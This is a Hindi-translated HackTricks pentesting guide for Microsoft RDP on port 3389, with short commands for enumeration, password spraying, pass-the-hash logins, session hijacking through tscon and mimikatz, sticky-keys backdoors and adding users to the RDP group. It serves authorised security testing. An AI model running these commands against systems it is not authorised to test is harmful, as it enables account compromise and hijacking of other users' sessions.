3389 - Pentesting RDP

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

सुरक्षा मूल्यांकन और पेनेट्रेशन टेस्टिंग के लिए तत्काल उपलब्ध सेटअप। किसी भी स्थान से 20+ टूल और सुविधाओं के साथ पूर्ण पेंटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेंटेस्टर्स को बदलने नहीं हैं - हम उन्हें कुछ समय वापस देने के लिए कस्टम टूल, पता लगाने और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई में खोज कर सकें, शैल्स पॉप कर सकें, और मज़ा कर सकें।

मूलभूत जानकारी

माइक्रोसॉफ्ट द्वारा विकसित, रिमोट डेस्कटॉप प्रोटोकॉल (RDP) एक ग्राफिकल इंटरफेस कनेक्शन स्थापित करने के लिए डिज़ाइन किया गया है जो कंप्यूटरों के बीच नेटवर्क पर होता है। इस तरह का एक कनेक्शन स्थापित करने के लिए, उपयोगकर्ता द्वारा RDP क्लाइंट सॉफ़्टवेयर का उपयोग किया जाता है, और साथ ही, दूरस्थ कंप्यूटर को RDP सर्वर सॉफ़्टवेयर का उपयोग करना आवश्यक होता है। यह सेटअप एक दूरस्थ कंप्यूटर के डेस्कटॉप वातावरण का सहज नियंत्रण और पहुंच संभावित करता है, मुख्य रूप से उपयोगकर्ता के स्थानीय उपकरण पर इसके इंटरफेस को लाने के लिए।

डिफ़ॉल्ट पोर्ट: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

जांच

स्वचालित

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

यह उपलब्ध एन्क्रिप्शन और डीओएस वंशवतता (सेवा को डीओएस कारणित किए बिना) की जांच करता है और एनटीएलएम विंडोज जानकारी (संस्करण) प्राप्त करता है।

सावधान रहें, आप खाते लॉक कर सकते हैं

पासवर्ड स्प्रेइंग

सावधान रहें, आप खाते लॉक कर सकते हैं

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

जाने गए credentials/hash के साथ कनेक्ट करें

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

RDP सेवाओं के खिलाफ जाने जाने वाले क्रेडेंशियल्स की जांच

impacket से rdp_check.py आपको यह जांचने में मदद करता है कि क्या कुछ क्रेडेंशियल RDP सेवा के लिए वैध हैं:

rdp_check <domain>/<name>:<password>@<IP>

त्वरित उपलब्ध सेटअप विकल्पिकता मूल्यांकन और पेनेट्रेशन टेस्टिंग के लिए। 20+ टूल और विशेषताएँ के साथ किसी भी जगह से पूर्ण पेनटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेनटेस्टर्स को बदलने नहीं देते - हम उन्हें वापस कुछ समय देने के लिए कस्टम टूल्स, पहचान और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई से खोदने, पॉप शैल्स करने और मज़ा करने में समर्थ हों।

हमले

सत्र चुराई

SYSTEM अनुमतियों के साथ आप किसी भी उपयोगकर्ता द्वारा खोली गई किसी भी RDP सत्र तक पहुंच सकते हैं बिना मालिक के पासवर्ड जानने की आवश्यकता के।

खुली सत्र प्राप्त करें:

query user

चयनित सत्र का एक्सेस

tscon <ID> /dest:<SESSIONNAME>

अब आप चयनित RDP सत्र में होंगे और आपको केवल Windows उपकरण और सुविधाओं का उपयोग करके उपयोगकर्ता का अनुकरण करना होगा।

महत्वपूर्ण: जब आप एक सक्रिय RDP सत्र में पहुंचते हैं, तो आप उपयोग कर रहे उपयोगकर्ता को बाहर कर देंगे।

आप प्रक्रिया डंपिंग से पासवर्ड प्राप्त कर सकते हैं, लेकिन यह विधि बहुत तेज है और आपको उपयोगकर्ता के वर्चुअल डेस्कटॉप के साथ बातचीत करने की अनुमति देती है (पासवर्ड नोटपैड में बिना डिस्क में सहेजे, अन्य RDP सत्र अन्य मशीनों में खोले गए...)

Mimikatz

आप इसे करने के लिए मिमीकैट्ज भी उपयोग कर सकते हैं:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

स्टिकी-कीज़ और यूटिलमैन

इस तकनीक को स्टिकीकीज़ या यूटिलमैन के साथ मिलाकर आप एक प्रशासनिक CMD और किसी भी RDP सत्र में कभी भी पहुंच सकेंगे

आप इस तरह की तकनीकों से पहले ही बैकडोर किए गए RDP को खोज सकते हैं: https://github.com/linuz/Sticky-Keys-Slayer

RDP प्रक्रिया इंजेक्शन

अगर कोई अलग डोमेन से या बेहतर प्रिविलेज के साथ RDP के माध्यम से लॉगिन करता है जिस PC पर आप एडमिन हैं, तो आप उसके RDP सत्र प्रक्रिया में अपना बीकन इंजेक्ट कर सकते हैं और उसके रूप में कार्य कर सकते हैं:

pageRDP Sessions Abuse

RDP समूह में उपयोगकर्ता जोड़ना

net localgroup "Remote Desktop Users" UserLoginName /add

स्वचालित उपकरण

AutoRDPwn एक पोस्ट-एक्सप्लोइटेशन फ्रेमवर्क है जो Powershell में बनाया गया है, जो मुख्य रूप से Microsoft Windows कंप्यूटर पर Shadow हमले को स्वचालित करने के लिए डिज़ाइन किया गया है। यह कमजोरी (Microsoft द्वारा एक विशेषता के रूप में सूचीबद्ध) एक दूरस्थ हमलावर को अपने पीड़ित के डेस्कटॉप को बिना उसकी सहमति के देखने की अनुमति देती है, और यहाँ तक कि उसे ऑपरेटिंग सिस्टम के खुद के उपकरणों का उपयोग करके नियंत्रित करने की अनुमति देती है।

  • कमांड लाइन से एक स्वचालित तरीके से माउस और कीबोर्ड को नियंत्रित करें

  • कमांड लाइन से क्लिपबोर्ड को नियंत्रित करें

  • एक SOCKS प्रॉक्सी को क्लाइंट से उत्पन्न करें जो नेटवर्क संचार को RDP के माध्यम से लक्ष्य तक चैनल करता है

  • लक्ष्य पर विचित्र SHELL और PowerShell कमांड्स को बिना फ़ाइल अपलोड किए उत्पन्न करें

  • लक्ष्य से फ़ाइलें अपलोड और डाउनलोड करें, यहाँ तक कि जब फ़ाइल ट्रांसफर लक्ष्य पर अक्षम हों

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.xyz/pentesting/pentesting-rdp

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

संक्षिप्त में उपलब्ध सेटअप व्यक्तिगतता मूल्यांकन और पेनेट्रेशन टेस्टिंग के लिए। 20+ टूल्स और विशेषताएँ के साथ कहीं से भी पूर्ण पेनटेस्ट चलाएं जो पुनरीक्षण से रिपोर्टिंग तक जाते हैं। हम पेनटेस्टर्स को बदलने नहीं जाते - हम उन्हें वापस कुछ समय देने के लिए कस्टम टूल्स, पता लगाने और शोषण मॉड्यूल विकसित करते हैं ताकि वे गहराई में खोज कर सकें, शैल्स पॉप कर सकें, और मज़ा कर सकें।

शून्य से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated